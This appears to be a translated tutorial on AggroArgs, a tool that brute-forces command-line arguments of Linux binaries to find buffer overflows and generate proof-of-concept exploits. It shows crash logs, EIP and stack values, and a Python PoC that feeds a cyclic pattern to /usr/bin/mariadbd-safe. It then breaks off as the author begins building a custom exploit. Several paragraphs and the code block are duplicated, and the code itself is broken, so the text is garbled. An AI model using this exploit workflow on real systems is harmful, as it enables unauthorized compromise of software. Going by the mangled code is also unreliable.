AggroArgs - Brute force command line buffer overflow and automated exploit generation, linux, aggressive arguments
Also, if you want a quick result, you can output all the results through the grep utility, it will look like this:
When viewing, pay attention to the WARNING parameter, it will show you Addr2Line and DEEP_analysis. The tool itself will generate a PoC for you using the address offset and EIP stack information, along with the pattern.
In general, at the end of the scan there will be some statistics, thanks to which we can see that we have 10+ binaries and an exploit was written for them, namely, his body, he works in conjunction with the tool itself:
Python:
Let's pay attention to addr2line and EIP. In the line with the WARNING pointer, we can see the segfault error message (segmentation error)
We are given a choice of several utility execution mods. We will use verbose mode (detailed output of information), you also need to specify a folder with binaries (executable files like ELF and others). The --blacklist= flag writes the files that we specify to the emergency, set the default, DEFAULT='*.so,*.so.*,dmesg,script,suspend,init,runlevel,reboot,shutdown,switchoff,*grep'
Also, if you want a quick result, you can output all the results through the grep utility, it will look like this:
We have to wait for some time until the bruteforce is over. But it is also better to use the --output-pos=./pos flag to write test results into it. After brutus, we get the result , look at output.txt
When viewing, pay attention to the WARNING parameter, it will show you Addr2Line and DEEP_analysis. The tool itself will generate a PoC for you using the address offset and EIP stack information, along with the pattern.
In general, at the end of the scan there will be some statistics, thanks to which we can see that we have 10+ binaries and an exploit was written for them, namely, his body, he works in conjunction with the tool itself:
Python:
Code:
#! /usr/bin/env python
#loglines == segfault at 7ffeb3380000 ip 00007f834f556ad9 sp 00007ffeb337df18 error 6 in libc.so.6[7f834f428000+16e000]
addr2line == ['addr2line: /usr/bin/mariadbd-safe: \xd1\x84\xd0\xbe\xd1\x80\xd0\xbc\xd0\xb0\xd1\x82 \xd1\x84\xd0\xb0\xd0\xb9\xd0\xbb\xd0\xb0 \xd0\xbd\xd0\xb5 \xd1\x80\xd0\xb0\xd1\x81\xd0\xbf\xd0\xbe\xd0\xb7\xd0\xbd\xd0\xb0\xd0\xbd', 'addr2line: /usr/bin/mariadbd-safe: \xd1\x84\xd0\xbe\xd1\x80\xd0\xbc\xd0\xb0\xd1\x82 \xd1\x84\xd0\xb0\xd0\xb9\xd0\xbb\xd0\xb0 \xd0\xbd\xd0\xb5 \xd1\x80\xd0\xb0\xd1\x81\xd0\xbf\xd0\xbe\xd0\xb7\xd0\xbd\xd0\xb0\xd0\xbd']
EIP == {'ip': '00007f834f556ad9', 'sp': '00007ffeb337df18', 'at': '7ffeb3380000', 'eip_ascii_real': '\x00\x008\xb3\xfe\x7f', 'eip_ascii': '\x7f\xfe\xb38\x00\x00'}
'''
import os, sys
import subprocess
clear()
CMD = '/usr/bin/mariadbd-safe'
ARGS = ['-r', 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2A...etc pattern']
if __name__=='__main__':
print "Target: %s"%CMD
[CODE=python]#! /usr/bin/env python
#loglines == segfault at 7ffeb3380000 ip 00007f834f556ad9 sp 00007ffeb337df18 error 6 in libc.so.6[7f834f428000+16e000]
addr2line == ['addr2line: /usr/bin/mariadbd-safe: \xd1\x84\xd0\xbe\xd1\x80\xd0\xbc\xd0\xb0\xd1\x82 \xd1\x84\xd0\xb0\xd0\xb9\xd0\xbb\xd0\xb0 \xd0\xbd\xd0\xb5 \xd1\x80\xd0\xb0\xd1\x81\xd0\xbf\xd0\xbe\xd0\xb7\xd0\xbd\xd0\xb0\xd0\xbd', 'addr2line: /usr/bin/mariadbd-safe: \xd1\x84\xd0\xbe\xd1\x80\xd0\xbc\xd0\xb0\xd1\x82 \xd1\x84\xd0\xb0\xd0\xb9\xd0\xbb\xd0\xb0 \xd0\xbd\xd0\xb5 \xd1\x80\xd0\xb0\xd1\x81\xd0\xbf\xd0\xbe\xd0\xb7\xd0\xbd\xd0\xb0\xd0\xbd']
EIP == {'ip': '00007f834f556ad9', 'sp': '00007ffeb337df18', 'at': '7ffeb3380000', 'eip_ascii_real': '\x00\x008\xb3\xfe\x7f', 'eip_ascii': '\x7f\xfe\xb38\x00\x00'}
'''
import os, sys
import subprocess
clear()
CMD = '/usr/bin/mariadbd-safe'
ARGS = ['-r', 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2A...etc pattern']
if __name__=='__main__':
print "Target: %s"%CMD
print "[ ] executing, please stand by ..."
ret = subprocess.Popen([CMD]+ARGS, shell=False,stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
print "[*] done!"
print "[ ] executing, please stand by ..."
ret = subprocess.Popen([CMD]+ARGS, shell=False,stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
print "[*] done!"Well, we ourselves will construct a separate exploit based on the data that the phaser gave us! As a goal, I'll take the file /usr/bin/mariadbd-safe (aka mysql) that I came across. Let's see what aggroArgs found:
